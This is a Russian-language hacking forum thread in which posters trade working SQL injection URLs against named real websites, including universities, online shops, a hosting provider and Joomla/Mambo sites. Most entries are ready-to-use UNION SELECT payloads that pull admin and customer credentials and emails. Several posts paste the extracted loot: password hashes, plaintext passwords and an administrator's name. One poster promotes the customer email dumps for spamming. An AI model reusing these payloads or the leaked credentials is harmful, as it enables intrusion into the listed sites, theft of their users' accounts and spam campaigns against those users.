SQL Инъекции

не ето не самописный точно если в гугле вбить inurl:"attorneys_bio.php" то он выдаст линков 20 и почти у всех будет скуля

 

Code:

http://www.ufo.com.br/bonus.php?id=-8+union+select+1,2,version()+admin/*

Code:

http://www.menestrersgascons.com/francais/groupesmusicaux/bonus.php?id=-5+union+select+1,2,VERSION(),4,5,6,7,8,9/*

Code:

http://www.kujtesa.com/bs.php?id=-33+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11,12,13,14/*

 

Mambo component Portfolio Manager 1.0

Code:

http://www.inta.org/index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*

(c) it's my

 

вот парочка ЕДУшек с ПР=6 =)

_http://experts.uchicago.edu/experts.php?id=99999+union+select+1,2,3,4,VERSION(),6,USER(),DATABASE(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
вручную подбирал =)

_http://wandp.american.edu/pages.php?ID=99999+union+select+1,2,3,4/*
тут чет непонятное...

 

http://www.thedietplate.us/products.php?cat=-99991%2527%2520+union+select+version()/* 4.1.22-standard

 

еще один:
_http://lapa.princeton.edu/peopledetail.php?ID=99999+union+select+1,2,3,4,VERSION(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/*

 

во, уже пятая версия мускула :
_http://www.geology.ohio-state.edu/faculty_bios.php?id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*

 

2 x88x
почему не понятно всё нормально

_http://wandp.american.edu/pages.php?ID=-5+union+select+1,aes_decrypt(aes_encrypt(user,0x71),0x71),aes_decrypt(aes_encrypt(password,0x71),0x71),4+from+mysql.user/*
root
*ADDF07FCC8E37371B887F38314C77A2FA4BC71CE

 

Обход фильтрации -

HTML:

http://wandp.american.edu/pages.php?ID=99999+union+select+1,2,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),4/*

 

PR-6.

http://www.ochenk.com/entry.php?id=-63+union+select+1,concat_ws(0x3A3a,version(),database(),user()),3,4/*

 

Ничего больше сделать не пробывал, ибо лень)) Там уж сами... кому надо, тот сделает))
Просто нашел скулю и решил выложить))
Удачи...

http://www.warcraftrealms.com/census.php?serverid=-298+union+select+table_name,2+from+information_schema.tables/*

http://www.warcraftrealms.com/census.php?serverid=-298+union+select+column_name,2+from+information_schema.columns/*

 

brassmedia.com

Code:

http://www.brassmedia.com/press/?id=-1+union+select+1,2,3,concat_ws(0x3,version(),user(),database()),5,6,7,8,9,10,11,12,13/*

5.0.22[email protected]brass_media

Code:

http://www.brassmedia.com/press/?id=-1+union+select+1,2,3,concat_ws(0x3,user_id,first_name,last_name,password),5,6,7,8,9,10,11,12,13+from+brass_magazine.brasscu_user_accounts/*

[email protected]frederickbrozyna jrhardrunner
http://brassmedia.serveftp.net/index.asp

 

4.1.9
-----------------------------------------------------

5.0.24a-standard-log
-----------------------------------------------------

4.0.18-log
логин не нашёл
пасс:s0o2r3z
-----------------------------------------------------

4.1.12-STANDARD
-----------------------------------------------------

4.0.27-standard-log

 

Code:

http://sify.com/astrology/fullstory.php?id=-14166076+union+select+0,7,3,concat(userid,0x3,password),5,6,7,8,9,0,0,2,3,4,5,6,7,8+from+users/*

akbar_babars0o2r3z
моть быть этот

 

Хыы я для спамера просто золотая жила свежих мыльников вот вам собираем карочь базы огромные просто (не везде конечно но много в основном)

HTML:

http://www.amenbeads.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*

HTML:

http://www.wallables.com/catalog/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*

HTML:

http://kissedbyangels.com/oscommerce/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*

HTML:

http://www.chibabogu.com/catalog/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*

HTML:

http://www.dvbhardware.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*

HTML:

http://www.diggorypress.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*

HTML:

http://www.foreverpets.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*

HTML:

http://www.energysavingworld.co.uk/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*

парсим пока тепленькие а то не успеите, остынут

 

Mambo Component Material Suche 1.0

Code:

http://www.berufsvorbereitung-medien.org/index.php?option=com_materialsuche&Itemid=70&tsk=detail&id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),null,null,7,null,9,null,null,null,null,14,null,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*

Сайтов с данной багой больше не нашел =/

 

вообшем скуль

Code:

http://www.newspress.fr/index.asp?lang='+or+1

db_name: newspress
sys_user :newspress_user
version:Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)


имена таблиц :

Code:

'ACCESPRESSE','addr','ADFP_CAT_IDS','ADFP_QUA_IDS',
'Adresse_Web','ALERT_COMM','algorithm','APPNAME','ARCHIVEDON','ARGUS_CAT_IDS','ARGUS_TEM_IDS','auid','backuplsn','BEGINDATE','bin_data','binary_message_body','bit_data','bitlength','bitposint','bitposleaf','brkrinst','CARNET','CARTE_ID','CAT_ID','CAT_IDS','Categorie_Titre','CATID','CCLIC','CDAYS','CDISP','cert','Chaine','chk','USERS'

берем таблицу и подбираем имена столбцов (пример для таблицы лог):

Code:

http://www.newspress.fr/index.asp?lang='+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME='LOG'+AND+C OLU MN_NAME+NOT+IN+('addr','xxx',))--

найдя нужный столбец например addr выводим

Code:

http://www.newspress.fr/index.asp?lang='+or+1=(SELECT+TOP+1+addr+from+LOG)--

в поиске и использовании очень помогла статья [cash]
http://forum.antichat.ru/threadnav30501-1-10.html

 

Joomla Component Artist

Code:

http://www.tremplin-avenir.com/index.php?option=com_artist&task=view_artist_file&artistId=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16+from+jos_users/*
http://www.dymok.net/index.php?option=com_artist&task=show_artist&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16+from+jos_users/*
http://www.aarte.net/index.php?option=com_artist&idgalery=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9+from+jos_users/*

Три разных уязвимых параметра

Добавлено:

Code:

http://www.hanoiguesthouse.net/index.php?option=com_list&city=-1+union+select+1,2,3,concat(version()),5,6,7,8,9,10/*

 

http://www.line-age.ru/statistics.php?show_page=show_clan_info&indx=10080'

 

хостерЖ
elabhosting.com

Code:

http://www.elabhosting.com/subtopic.php?id=99999'+union+select+1,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),3,4+from+users+limit+1,1/*

Таблицы и поля, которые я подобрал:

HTML:

users
  email
  password
  first_name
  last_name
domains
server
  id
  name

А вот и адимн:

First Name: Wael
Last Name: Elkadi
pass: william
[email protected]